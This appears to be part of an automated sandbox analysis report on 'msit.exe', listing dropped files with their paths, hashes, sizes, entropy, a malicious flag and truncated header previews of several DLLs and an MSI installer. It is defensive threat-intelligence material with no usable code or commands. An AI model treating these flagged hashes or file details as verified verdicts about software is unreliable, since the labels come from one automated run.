SSDEEP:	24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
MD5:	ACCD9092A35E468E8AF934ACCD81E9F6
SHA1:	3751384E5E586481618002469190E3C1F271CE6D
SHA-256:	8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
SHA-512:	18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI986D.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	908128
Entropy (8bit):	6.595002426238024
Encrypted:	false
SSDEEP:	24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
MD5:	ACCD9092A35E468E8AF934ACCD81E9F6
SHA1:	3751384E5E586481618002469190E3C1F271CE6D
SHA-256:	8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
SHA-512:	18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI98AD.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	908128
Entropy (8bit):	6.595002426238024
Encrypted:	false
SSDEEP:	24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
MD5:	ACCD9092A35E468E8AF934ACCD81E9F6
SHA1:	3751384E5E586481618002469190E3C1F271CE6D
SHA-256:	8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
SHA-512:	18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI98DD.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	908128
Entropy (8bit):	6.595002426238024
Encrypted:	false
SSDEEP:	24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
MD5:	ACCD9092A35E468E8AF934ACCD81E9F6
SHA1:	3751384E5E586481618002469190E3C1F271CE6D
SHA-256:	8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
SHA-512:	18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIA6C8.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	908128
Entropy (8bit):	6.595002426238024
Encrypted:	false
SSDEEP:	24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
MD5:	ACCD9092A35E468E8AF934ACCD81E9F6
SHA1:	3751384E5E586481618002469190E3C1F271CE6D
SHA-256:	8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
SHA-512:	18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIA708.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	908128
Entropy (8bit):	6.595002426238024
Encrypted:	false
SSDEEP:	24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
MD5:	ACCD9092A35E468E8AF934ACCD81E9F6
SHA1:	3751384E5E586481618002469190E3C1F271CE6D
SHA-256:	8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
SHA-512:	18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TeleportPresets.txt

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	740
Entropy (8bit):	5.1730907895834575
Encrypted:	false
SSDEEP:	12:QzVUXp7bIsbbUpD3SO9X8J3M87h9rBqkJYa3fixhiGVnsNRkZOQUA/F9At5wUniO:QzSZosuD3S7J377NqkJuhiGKRkwA3Atd
MD5:	DBA29B1CC6A0AC337A02A1B600E59E60
SHA1:	EFEFF3878B981326DA4C70BE8F9396F0B6020247
SHA-256:	9331EA0E713C45E2439D7D12709FDD0E1528137C0EF89AE96FB03150D0D9A5DE
SHA-512:	E67A41BEC75514ECB47EF2B0FE477CB2240CE9254D1656488F1F0E83B86E43E32B316F9DEDA9A67E731773928F9479CF80DABCEFE88C99AC1F7DE5DCA795109E
Malicious:	false
Preview:	Intro;V(X=340931.38, Y=666722.19, Z=409.60);R(0)..Start_02;V(X=367538.00, Y=595014.00, Z=212.17);R(0)..OldBridge_Hut;V(X=362269.19, Y=589130.19, Z=750.27);R(0)..Zalissya;V(X=401922.22, Y=549398.50, Z=698.31);R(0)..SW_Church;V(X=761943.12, Y=712179.81, Z=2849.92);R(0)..SW_EastTower;V(X=743126.25, Y=764860.44, Z=1989.11);R(0)..SW_FishingFarm;V(X=767872.62, Y=732877.50, Z=1384.00);R(0)..SW_Pumping;V(X=743319.88, Y=736860.38, Z=1887.85);R(0)..SW_ClearSky;V(X=783729.06, Y=756685.00, Z=1621.93);R(0)..SW_BurntFarm;V(X=737051.75, Y=709953.06, Z=1781.97);R(0)..SW_NorthTower;V(X=761805.69, Y=726109.50, Z=1428.26);R(0)..ART_MUSEUM;V(X=1007865.62, Y=36386.11, Z=61790.83);R(Y=348.64)..Rostok;V(X=317827.750000,Y=415159.250000,Z=702.566772);R(0)

C:\Users\user\AppData\Local\Temp\shi95F5.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5038592
Entropy (8bit):	6.043058205786219
Encrypted:	false
SSDEEP:	49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
MD5:	11F7419009AF2874C4B0E4505D185D79
SHA1:	451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
SHA-256:	AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
SHA-512:	1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L......N.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\TeleportPresets.txt

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	740
Entropy (8bit):	5.1730907895834575
Encrypted:	false
SSDEEP:	12:QzVUXp7bIsbbUpD3SO9X8J3M87h9rBqkJYa3fixhiGVnsNRkZOQUA/F9At5wUniO:QzSZosuD3S7J377NqkJuhiGKRkwA3Atd
MD5:	DBA29B1CC6A0AC337A02A1B600E59E60
SHA1:	EFEFF3878B981326DA4C70BE8F9396F0B6020247
SHA-256:	9331EA0E713C45E2439D7D12709FDD0E1528137C0EF89AE96FB03150D0D9A5DE
SHA-512:	E67A41BEC75514ECB47EF2B0FE477CB2240CE9254D1656488F1F0E83B86E43E32B316F9DEDA9A67E731773928F9479CF80DABCEFE88C99AC1F7DE5DCA795109E
Malicious:	false
Preview:	Intro;V(X=340931.38, Y=666722.19, Z=409.60);R(0)..Start_02;V(X=367538.00, Y=595014.00, Z=212.17);R(0)..OldBridge_Hut;V(X=362269.19, Y=589130.19, Z=750.27);R(0)..Zalissya;V(X=401922.22, Y=549398.50, Z=698.31);R(0)..SW_Church;V(X=761943.12, Y=712179.81, Z=2849.92);R(0)..SW_EastTower;V(X=743126.25, Y=764860.44, Z=1989.11);R(0)..SW_FishingFarm;V(X=767872.62, Y=732877.50, Z=1384.00);R(0)..SW_Pumping;V(X=743319.88, Y=736860.38, Z=1887.85);R(0)..SW_ClearSky;V(X=783729.06, Y=756685.00, Z=1621.93);R(0)..SW_BurntFarm;V(X=737051.75, Y=709953.06, Z=1781.97);R(0)..SW_NorthTower;V(X=761805.69, Y=726109.50, Z=1428.26);R(0)..ART_MUSEUM;V(X=1007865.62, Y=36386.11, Z=61790.83);R(Y=348.64)..Rostok;V(X=317827.750000,Y=415159.250000,Z=702.566772);R(0)

C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {EA6270CA-0126-4785-A430-33ABC9DC920B}, Number of Words: 8, Subject: msit, Author: msit, Name of Creating Application: msit, Template: x64;1033, Comments: This installer database contains the logic and data required to install msit., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Dec 13 04:07:47 2024, Last Saved Time/Date: Fri Dec 13 04:07:47 2024, Last Printed: Fri Dec 13 04:07:47 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	49342976
Entropy (8bit):	6.869504787159507
Encrypted:	false
SSDEEP:	786432:WzwqNUHytvnMdfw6FVUrUl7eOuTt3aOTZ:6iStvnMRw+VUrUl7eOmlaOTZ
MD5:	71B30F6890F9ECF0FABBF1CBBC2427F8
SHA1:	41C12ABEDF033CA0E5D0114520B40F4160A20029
SHA-256:	5FE2CD05A7CD3783644E141058408F08427F02DDBA6B7BC4220F191A43523A85
SHA-512:	2968E78F4FF28A77B2A6013D70774FED98DF3B0CC6496F5D937CF046F37825027E4C2832F9342F0FD61EEFDA89DD4E1067FD602B9056D9B893BE8D0F10628BE1
Malicious:	false
Preview:	......................>.......................................................L.......e.......u...........................................................................................................................................................................................................................................................................................................................................................................................................................................................%...9........................................................................................... ...!..."...#...$.../...1...'...(...)...*...+...,...-...........0...2...7...3...4...5...6...:...8...A...D...;...<...=...>...?...@...K...B...C.......E...F...G...H...I...J...............N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\holder0.aiph

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	data
Category:	dropped
Size (bytes):	740
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	8A6C6015821A7B3E6CEA958B2A6C18FB
SHA1:	0B5C28D4C54D84B26E8C55D9D8D5597F75B04568
SHA-256:	AD9484F24235FDAC13BBA66E24D5ECC16B72C6DE9BD27A3922F60833FE07679D
SHA-512:	F776F99B5D0E1C89E3F21AADD4A95C1D1F69396AAEA98439261C313CCE1EED81205046E6B628910AEABC8964194E3B19767CB368692BAE6579790EC91141C109
Malicious:	false
Preview:	....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\599bb2.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {EA6270CA-0126-4785-A430-33ABC9DC920B}, Number of Words: 8, Subject: msit, Author: msit, Name of Creating Application: msit, Template: x64;1033, Comments: This installer database contains the logic and data required to install msit., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Dec 13 04:07:47 2024, Last Saved Time/Date: Fri Dec 13 04:07:47 2024, Last Printed: Fri Dec 13 04:07:47 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	49342976
Entropy (8bit):	6.869504787159507
Encrypted:	false
SSDEEP:	786432:WzwqNUHytvnMdfw6FVUrUl7eOuTt3aOTZ:6iStvnMRw+VUrUl7eOmlaOTZ
MD5:	71B30F6890F9ECF0FABBF1CBBC2427F8
SHA1:	41C12ABEDF033CA0E5D0114520B40F4160A20029
SHA-256:	5FE2CD05A7CD3783644E141058408F08427F02DDBA6B7BC4220F191A43523A85
SHA-512:	2968E78F4FF28A77B2A6013D70774FED98DF3B0CC6496F5D937CF046F37825027E4C2832F9342F0FD61EEFDA89DD4E1067FD602B9056D9B893BE8D0F10628BE1
Malicious:	false
Preview:	......................>.......................................................L.......e.......u...........................................................................................................................................................................................................................................................................................................................................................................................................................................................%...9........................................................................................... ...!..."...#...$.../...1...'...(...)...*...+...,...-...........0...2...7...3...4...5...6...:...8...A...D...;...<...=...>...?...@...K...B...C.......E...F...G...H...I...J...............N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSIA16F.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA1CE.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA20D.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA23D.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA28C.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1201504
Entropy (8bit):	6.4558508565404535
Encrypted:	false
SSDEEP:	24576:h4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWqTIUGFUrHtAkJMsFUh29BKjxm:a2QxNwCsec+4VGWSlnfYvOjUGFUrHtA2
MD5:	03CC8828BB0E0105915B7695B1EC8D88
SHA1:	CBF8EC531EA7E3EE58B51BD642F8BFABDC759EE1
SHA-256:	0E1491AE7344F3A5EC824732648CCDDA19B271D6F01471793BF292840FC83B5E
SHA-512:	593A76166EB6CE2E3537B0D93E216DAEF12E4AB5B181A194B55A90B39A1AF2E0374C4EC3833A000530425319A003CD1A648489640FCCAF108061EBEA1D9CB1E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............@G..@G..@G.yCF..@G.yEF..@G.\|CF..@G.\|DF..@G.\|EF..@G.yDF..@G.yAF..@G..AG..@G.}IF..@G.}@F..@G.}.G..@G...G..@G.}BF..@GRich..@G........PE..L...v..f.........."!...).~..........Pq.......................................`............@A........................ ...t...............................`=.......l......p........................... ...@...............L............................text...J}.......~.................. ..`.rdata...;.......<..................@..@.data...............................@....fptable............................@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA2BC.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA2EC.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	908128
Entropy (8bit):	6.595002426238024
Encrypted:	false
SSDEEP:	24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
MD5:	ACCD9092A35E468E8AF934ACCD81E9F6
SHA1:	3751384E5E586481618002469190E3C1F271CE6D
SHA-256:	8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
SHA-512:	18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Windows\Installer\MSIA416.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1524
Entropy (8bit):	5.508356356630362
Encrypted:	false
SSDEEP:	24:ILgMV8Tvbdtu64SOu07QrWzdUC+gext8TvgypUPqFP3E6N9Sv8cVSDhiSDxt8TvW:IL36BcuyQrItqtkqOP3tNgvED8SNtX
MD5:	57CEA738D782EE28B790056220CB395E
SHA1:	F6B7DBAD903679EAF2FC9A4BD73BE6DB3297E8E2
SHA-256:	A26FF8EBCC3D162182BF4E390997EC039845D9CAD2CC1A2399C090E94A53E6D4
SHA-512:	EA193E92F541209B0B4DF4E56AA43D6C39FF640D598C033F154BFE8C09C13B53A5E215148796C51E084DCA45E0D1FA44A186C32E46BA90A99DE055C4B6B5579D
Malicious:	false
